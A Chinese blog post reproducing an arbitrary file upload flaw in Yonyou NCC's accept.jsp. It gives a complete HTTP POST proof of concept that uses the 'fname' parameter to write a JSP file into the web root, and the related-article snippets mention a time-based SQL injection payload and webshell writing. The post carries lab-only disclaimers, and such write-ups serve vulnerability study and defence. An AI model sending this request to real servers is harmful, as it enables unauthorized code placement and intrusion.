用友ncc accept.jsp漏洞

这篇具有很好参考价值的文章主要介绍了用友ncc accept.jsp漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞原理

accept.jsp源码中设置了白名单和黑名单的代码,但是白名单代码被注释掉了(默认被注释)

只启用了黑名单。文件保存的函数fname又被定义为可以随便更改。

那可以上传白名单内的文件名,然后通过传参将文件保存的名字进行修改。以及修改文件位置

(具体源码不能够在平台展示出)

漏洞靶场复现

以下复现常见均在靶场上进行,请获得授权后在开展渗透

用友ncc accept.jsp漏洞

访问页面 http://ip:prot//aim/equipmap/accept.jsp

页面存在存在 则表明漏洞可能能够利用

通过POST发送数据包

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 370
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="test.txt"
Content-Type: text/plain

win
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"

\webapps\nc_web\test.jsp
-----------------------------16314487820932200903769468567--
用友ncc accept.jsp漏洞

解析一下请求的意思

这里值得注意的是 因为安装环境不同,所以可能会遇到保存的路径不一致的情况,这时候需要猜测服务器的路径。(但是默认为POC中的路径)

然后根据响应包是否包含parent.afterUpload(1)来判断文件是否上传成功

上传成功访问

用友ncc accept.jsp漏洞

以上复现均在靶场上实现!网络不是法外之地!请遵循中华人民共和国网络安全法 文章来源地址https://www.toymoban.com/news/detail-476955.html

到了这里,关于用友ncc accept.jsp漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 用友时空 KSOA 多处SQL注入漏洞复现

    用友时空 KSOA 是建立在 SOA 理念指导下研发的新一代产品,是根据流通企业前沿的 IT 需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。 用友时空 KSOA 系统 PayBill、QueryService、linkadd.jsp等接口处存在 sql 注入漏洞,攻击者可通过这些漏洞

    2024年02月04日
    浏览(40)
  • 用友GRP-U8 SQL注入漏洞复现

        用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。  用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有

    2024年02月07日
    浏览(45)
  • 用友 GRP-U8 存在sql注入漏洞复现

    用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 fofa:app=”用友-GRP-U8” /u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’— 命令:nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -

    2024年02月08日
    浏览(46)
  • 用友时空KSOA ImageUpload任意文件上传漏洞复现+利用

      用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活

    2024年02月15日
    浏览(51)
  • 用友NC word.docx 任意文件读取漏洞复现

     用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。 用友NC 系统word.docx等接口存在任意文件读取漏洞,未经身份认证

    2024年01月25日
    浏览(31)
  • 用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露

    用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。 漏洞POC 访问出现这个页面 可能存在漏洞(还有一种情

    2024年02月11日
    浏览(31)
  • 实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件上传漏洞+getshell

    前言,本次笔记是记录在工作中的打红队时挖到的用友时空KSOA任意文件上传漏洞。 emmm,怎么说呢,就是又在一次加班码到晚上十点的时候,挖掘到了一个用友时空ksoa v9.0文件上传漏洞。 大家先看看长什么样吧,大概就这样!版本这么明目张胆的就展现在我面前,不找一下这

    2024年02月08日
    浏览(47)
  • 基于 NCC/灰度信息 的模板匹配算法(QT + Opencv + C++),10ms内获取匹配结果,部分源码

    文后代码,优化效果图结尾处,最快3ms得到匹配结果 NCC,全称为Normalized Cross Correlation,即归一化互相关系数, 在模板匹配中使用的非常非常广泛,也是众多模板匹配方法中非常耀眼的存在, 这个匹配的理论核心基础公式如下: 其实Opencv的matchTemplate函数使用的就是这个公式

    2024年02月08日
    浏览(44)
  • 用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁

    补丁名称 问题描述 发布时间 产品版本 领域 模块 nc65_sysFunctionManager下标越界和空指针合集补丁 2023-3-23 10:03 NC6.5 集团采供 库存管理 nc633_ldap公共入口漏洞补丁 nc633_ldap公共入口漏洞补丁 2023-3-20 16:59 NC6.33 UAP 基础技术框架 nc65_ldap公共入口漏洞补丁 nc65_ldap公共入口漏洞补丁 20

    2024年02月13日
    浏览(35)
  • 用友 GRP-U8 Proxy XXE-SQL注入漏洞

    本篇文章仅限技术学习与安全研究,切勿将文中所涉及的攻击手段用于非授权下渗透行为,造成任何后果与本文和作者无关。 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府

    2023年04月08日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包